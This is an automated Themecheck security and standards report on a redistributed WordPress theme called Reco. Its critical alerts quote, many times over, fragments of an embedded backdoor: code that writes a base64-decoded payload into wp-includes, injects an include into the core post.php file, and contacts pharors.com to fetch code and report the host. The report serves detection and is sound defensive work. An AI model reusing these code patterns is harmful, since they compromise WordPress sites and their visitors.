12
Validation results

Reco | Shared By VestaThemes.com

Reco | Shared By VestaThemes.com

WordPress 5.2.2 theme
12
  • THEME TYPEWordPress theme 5.2.2
  • FILE NAMEwp-reco.zip
  • FILE SIZE1429929 bytes
  • MD5b9e0cdcae3458affab780998328612a6
  • SHA1f4c9035acf44d30097140aea1ce15bfb77efda28
  • LICENSEGNU GPL 2
  • FILES INCLUDEDCSS, PHP, XML, Bitmap images, Adobe Illustrator
  • THEME URIhttp://estudiopatagon.com/themes/wordpress/recov3
  • VERSION3.1.3
  • AUTHOR URI
  • TAGSsuper-light, speed, colorfull, freebies, magazine, two-columns, three-columns, responsive-layout, custom-colors, theme-options, translation-ready
  • CREATION DATE2019-07-30
  • LAST FILE UPDATE2019-07-30
  • LAST VALIDATION2019-07-30 00:47
This theme seems to be proprietary. Themecheck doesn't distribute commercial themes.
Critical alerts
  1. Security breaches : Modification of PHP server settings Found ini_set in file class.theme-modules.php. 5: ini_set('display_errors', 0);
  2. Security breaches : Use of base64_decode() Found base64_decode in file class.theme-modules.php. 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS['WP_CD_CODE']))) )95: $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
  3. Presence of iframes : iframes are sometimes used to load unwanted adverts and malicious code on another site Found <iframe title="<?php the_title(); ?>" src="<?php echo esc_url(EPCL_THEMEPATH); ?>/assets/images/transparent.gif" data-lazy="true" data-src="<?php echo esc_url($video_url); ?> in file post-formats.php. 149: <iframe title='<?php the_title(); ?>' src='<?php echo esc_url(EPCL_THEMEPAT
  4. Malware : Operations on file system file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.pharors.com/o.php?host=' . $_SERVER['HTTP_HOS172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt'));177: $content = @file_get_contents('http://www.pharors.com/o.php?host=' . $_SERVER['HTTP_HOS178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.pharors.com/o.php?host=' . $_SERVER['HTTP_HOS172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt'));177: $content = @file_get_contents('http://www.pharors.com/o.php?host=' . $_SERVER['HTTP_HOS178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.pharors.com/o.php?host=' . $_SERVER['HTTP_HOS172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt'));177: $content = @file_get_contents('http://www.pharors.com/o.php?host=' . $_SERVER['HTTP_HOS178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.pharors.com/o.php?host=' . $_SERVER['HTTP_HOS172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt'));177: $content = @file_get_contents('http://www.pharors.com/o.php?host=' . $_SERVER['HTTP_HOS178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.pharors.com/o.php?host=' . $_SERVER['HTTP_HOS172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt'));177: $content = @file_get_contents('http://www.pharors.com/o.php?host=' . $_SERVER['HTTP_HOS178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.pharors.com/o.php?host=' . $_SERVER['HTTP_HOS172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt'));177: $content = @file_get_contents('http://www.pharors.com/o.php?host=' . $_SERVER['HTTP_HOS178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.pharors.com/o.php?host=' . $_SERVER['HTTP_HOS172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt'));177: $content = @file_get_contents('http://www.pharors.com/o.php?host=' . $_SERVER['HTTP_HOS178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.pharors.com/o.php?host=' . $_SERVER['HTTP_HOS172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt'));177: $content = @file_get_contents('http://www.pharors.com/o.php?host=' . $_SERVER['HTTP_HOS178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.pharors.com/o.php?host=' . $_SERVER['HTTP_HOS172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt'));177: $content = @file_get_contents('http://www.pharors.com/o.php?host=' . $_SERVER['HTTP_HOS178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.pharors.com/o.php?host=' . $_SERVER['HTTP_HOS172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt'));177: $content = @file_get_contents('http://www.pharors.com/o.php?host=' . $_SERVER['HTTP_HOS178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.pharors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);
Warning
  1. theme tags : Presence of bad theme tagsFound wrong tag super-light in style.css header.Found wrong tag speed in style.css header.Found wrong tag colorfull in style.css header.Found wrong tag freebies in style.css header.Found wrong tag magazine in style.css header.The tag responsive-layout has been deprecated, it must be removed from style.css header.
  2. Text domain : Incorrect use of translation functions.Wrong installation directory for the theme name. The directory name must match the slug of the theme. This theme's correct slug and text-domain is reco-shared-by-vestathemes-com.
  3. Text domain : Incorrect use of translation functions.More than one text-domain is being used in this theme. This means the theme will not be compatible with WordPress.org language packs. The domains found are woocommerce, reco, tgmpa.
  4. Custom elements : Presence of custom headerNo reference to custom header was found in the theme.
  5. Custom elements : Presence of custom backgroundNo reference to custom background was found in the theme.
  6. I18N implementation : Proper use of _e(Possible variable $wp_query found in translation function in author.php. Translation function calls should not contain PHP variables. Possible variable $total_posts found in translation function in classic-posts.php. Translation function calls should not contain PHP variables. Possible variable $wp_query found in translation function in classic-posts.php. Translation function calls should not contain PHP variables. Possible variable $total_posts found in translation function in grid-sidebar.php. Translation function calls should not contain PHP variables. Possible variable $wp_query found in translation function in grid-sidebar.php. Translation function calls should not contain PHP variables. Possible variable $total_posts found in translation function in grid-posts.php. Translation function calls should not contain PHP variables. Possible variable $wp_query found in translation function in grid-posts.php. Translation function calls should not contain PHP variables.
  7. I18N implementation : Proper use of esc_html_e(Possible variable $wp_query found in translation function in author.php. Translation function calls should not contain PHP variables. Possible variable $total_posts found in translation function in classic-posts.php. Translation function calls should not contain PHP variables. Possible variable $wp_query found in translation function in classic-posts.php. Translation function calls should not contain PHP variables. Possible variable $total_posts found in translation function in grid-sidebar.php. Translation function calls should not contain PHP variables. Possible variable $wp_query found in translation function in grid-sidebar.php. Translation function calls should not contain PHP variables. Possible variable $total_posts found in translation function in grid-posts.php. Translation function calls should not contain PHP variables. Possible variable $wp_query found in translation function in grid-posts.php. Translation function calls should not contain PHP variables.
  8. Screenshot : Screenshot fileScreenshot size is 880x660px. Screenshot size should be 1200x900, to account for HiDPI displays. Any 4:3 image size is acceptable, but 1200x900 is preferred.
Tip-off
  1. Static links : Presence of hard-coded linksPossible hard-coded links were found in the file single.php.243: <noscript><?php esc_html_e('Please enable JavaScript to view the', 'reco'); ?> <a href='https://disqus.com/?ref_noscript' rel='nofollow'><?php esc_html_e('commentsPossible hard-coded links were found in the file page.php.119: <noscript><?php esc_html_e('Please enable JavaScript to view the', 'reco'); ?> <a href='https://disqus.com/?ref_noscript' rel='nofollow'><?php esc_html_e('comments
  2. Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
  3. Optional files : Presence of front page template file front-page.phpThis theme does not contain optional file front-page.php.
  4. Optional files : Presence of category template file category.phpThis theme does not contain optional file category.php.
  5. Optional files : Presence of tag template file tag.phpThis theme does not contain optional file tag.php.
  6. Optional files : Presence of term template file taxonomy.phpThis theme does not contain optional file taxonomy.php.
  7. Optional files : Presence of date/time template file date.phpThis theme does not contain optional file date.php.
  8. Optional files : Presence of attachment template file attachment.phpThis theme does not contain optional file attachment.php.
  9. Optional files : Presence of image template file image.phpThis theme does not contain optional file image.php.
  10. Use of includes : Use of include or requireThe theme appears to use include or require : class.theme-modules.php 48: $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-vcd.php\')) include_once(dirname(__FILE__) . \'/wp-vcd.php\'); ?>' . $file; If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
Other checked themes